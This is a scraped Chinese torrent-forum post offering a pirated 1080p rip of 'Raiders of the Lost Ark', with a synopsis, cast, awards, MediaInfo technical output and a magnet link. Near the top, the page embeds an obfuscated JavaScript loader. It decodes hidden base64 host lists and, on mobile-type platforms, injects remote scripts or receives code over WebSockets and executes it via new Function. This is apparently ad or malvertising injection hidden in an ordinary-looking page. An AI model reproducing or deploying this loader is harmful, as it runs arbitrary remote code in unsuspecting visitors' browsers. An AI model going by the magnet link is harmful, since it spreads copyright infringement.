夺宝奇兵[国语音轨/简体字幕].Indiana.Jones.and.the.Raiders.of.the.Lost.Ark.1981.1080p.迅雷下载 15.57GB

版主小s 28天前 191

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 夺宝奇兵/Indiana Jones and the Raiders of the Lost Ark/印地安纳?琼斯之夺宝奇兵/夺宝奇兵:法柜奇兵/法柜奇兵

◎片 名 Raiders of the Lost Ark

◎年 代 1981

◎产 地 美国,英国

◎类 别 动作 / 冒险

◎语 言 英语,德语,希伯来语,西班牙语,阿拉伯语,尼泊尔语

◎上映日期 1981-06-12(美国)

◎豆瓣评分 7.9/10 from 77672 users

◎豆瓣链接 https://movie.douban.com/subject/1296717/

◎片 长 115 分钟

◎导 演 史蒂文·斯皮尔伯格 Steven Spielberg

◎编 剧 劳伦斯·卡斯丹 Lawrence Kasdan / 乔治·卢卡斯 George Lucas / 菲利普·考夫曼 Philip Kaufman

◎主 演 哈里森·福特 Harrison Ford

凯伦·阿兰 Karen Allen

保罗·弗里曼 Paul Freeman

约翰·瑞斯-戴维斯 John Rhys-Davies

基兰·沙阿 Kiran Shah

弗兰克·马歇尔 Frank Marshall

乔治·哈里斯 George Harris

阿尔弗雷德·莫里纳 Alfred Molina

帕特·罗奇 Pat Roach

安东尼·希金斯 Anthony Higgins

罗纳德·莱西 Ronald Lacey

丹霍姆·艾略特 Denholm Elliott

特里·伦纳德 Terry Leonard

Nick Gillard Nick Gillard

◎标 签 冒险 | 斯皮尔伯格 | 美国 | 动作 | 探险 | 经典 | 美国电影 | 1981

◎简 介

二战期间,希特勒在世界各地召集考古学家寻找“失落的约柜”——圣经中引导希伯来人与上帝交流的圣物,希特勒欲借其来护佑纳粹的战争。

为了使希特勒的计划破灭,印第安纳琼斯博士(Harrison Ford饰)奔赴尼泊尔,一边奋力挖掘蛛丝马迹,一边还要与无孔不入的纳粹分子周旋。凭借着过人的智慧和异于常人的胆量及大无畏的勇气,琼斯终于在罗马找到了指示约柜位置的太阳手杖,继而发现了约柜。

就在大功告成之际,纳粹军却侵吞了胜利果实,还将琼斯等人留在了蛇穴里!但是无往不胜的琼斯总是有办法死里逃生,并狠狠地还以颜色!

◎获奖情况

第54届奥斯卡金像奖 ?(1982)

最佳影片(提名) 弗兰克·马歇尔

最佳导演(提名) 史蒂文·斯皮尔伯格

最佳摄影(提名) 道格拉斯·斯洛科姆

最佳剪辑 迈克尔·卡恩

最佳视觉效果 理查德·艾德兰德?/?乔·庄斯顿?/?基特·韦斯特?/?布鲁斯·尼科尔森

最佳音响 格雷格·兰达克?/?比尔·瓦尼?/?史蒂夫·马斯洛?/?罗伊·查尔曼

最佳艺术指导 诺曼·雷诺兹?/?莱斯利·迪利?/?迈克尔·福特

最佳原创配乐(提名) 约翰·威廉姆斯

特别成就奖 理查德·路易斯·安德森?/?本·贝尔特

  1. General

  2. Unique ID : 10698718457832719664935547947843584472 (0x80C7F8BA33A73E024AD5486345001D8)

  3. Complete name : Indiana.Jones.and.the.Raiders.of.the.Lost.Ark.1981.1080p.BluRay.x264.DTS.2Audio-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 15.6 GiB

  7. Duration : 1 h 55 min

  8. Overall bit rate : 19.3 Mb/s

  9. Movie name : Raiders of the Lost Ark 1981

  10. Encoded date : UTC 2021-07-01 12:34:12

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 55 min

  25. Bit rate : 16.3 Mb/s

  26. Width : 1 920 pixels

  27. Height : 816 pixels

  28. Display aspect ratio : 2.35:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.433

  36. Stream size : 13.1 GiB (84%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.8000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 55 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 509 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossy

  57. Stream size : 1.22 GiB (8%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Audio #2

  63. ID : 3

  64. ID in the original source medium : 4357 (0x1105)

  65. Format : DTS

  66. Format/Info : Digital Theater Systems

  67. Codec ID : A_DTS

  68. Duration : 1 h 55 min

  69. Bit rate mode : Constant

  70. Bit rate : 1 510 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : C L R Ls Rs LFE

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 93.750 FPS (512 SPF)

  75. Bit depth : 24 bits

  76. Compression mode : Lossy

  77. Stream size : 1.22 GiB (8%)

  78. Title : Mandarin

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No

  82. Original source medium : Blu-ray


  83. Text #1

  84. ID : 4

  85. ID in the original source medium : 4608 (0x1200)

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 50 min

  91. Bit rate : 39.2 kb/s

  92. Count of elements : 2610

  93. Stream size : 31.0 MiB (0%)

  94. Title : 简英特效字幕

  95. Language : Chinese

  96. Default : Yes

  97. Forced : No

  98. Original source medium : Blu-ray


  99. Text #2

  100. ID : 5

  101. ID in the original source medium : 4612 (0x1204)

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 50 min

  107. Bit rate : 29.9 kb/s

  108. Count of elements : 2830

  109. Stream size : 23.7 MiB (0%)

  110. Title : 国配特效字幕

  111. Language : Chinese

  112. Default : Yes

  113. Forced : No

  114. Original source medium : Blu-ray


  115. Text #3

  116. ID : 6

  117. ID in the original source medium : 4610 (0x1202)

  118. Format : PGS

  119. Muxing mode : zlib

  120. Codec ID : S_HDMV/PGS

  121. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  122. Duration : 1 h 49 min

  123. Bit rate : 23.5 kb/s

  124. Count of elements : 2022

  125. Stream size : 18.4 MiB (0%)

  126. Language : English

  127. Default : Yes

  128. Forced : No

  129. Original source medium : Blu-ray


  130. Menu

  131. 00:00:00.000 : Chapter 01

  132. 00:03:16.529 : Chapter 02

  133. 00:05:44.635 : Chapter 03

  134. 00:09:51.132 : Chapter 04

  135. 00:12:49.351 : Chapter 05

  136. 00:15:23.631 : Chapter 06

  137. 00:20:27.434 : Chapter 07

  138. 00:22:58.418 : Chapter 08

  139. 00:28:51.354 : Chapter 09

  140. 00:33:42.395 : Chapter 10

  141. 00:36:23.389 : Chapter 11

  142. 00:40:04.819 : Chapter 12

  143. 00:42:16.158 : Chapter 13

  144. 00:46:41.507 : Chapter 14

  145. 00:49:32.928 : Chapter 15

  146. 00:51:00.932 : Chapter 16

  147. 00:55:11.141 : Chapter 17

  148. 00:58:33.218 : Chapter 18

  149. 01:03:05.740 : Chapter 19

  150. 01:08:26.143 : Chapter 20

  151. 01:10:25.346 : Chapter 21

  152. 01:15:33.153 : Chapter 22

  153. 01:22:24.356 : Chapter 23

  154. 01:25:43.763 : Chapter 24

  155. 01:29:57.517 : Chapter 25

  156. 01:34:30.665 : Chapter 26

  157. 01:38:06.171 : Chapter 27

  158. 01:41:06.060 : Chapter 28

  159. 01:44:06.823 : Chapter 29

  160. 01:47:01.415 : Chapter 30

  161. 01:49:05.997 : Chapter 31


TAGS 动作 冒险

磁力链:
  • magnet:?xt=urn:btih:013092B89AD0057B91D4CEE8695EDF6707B1080A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回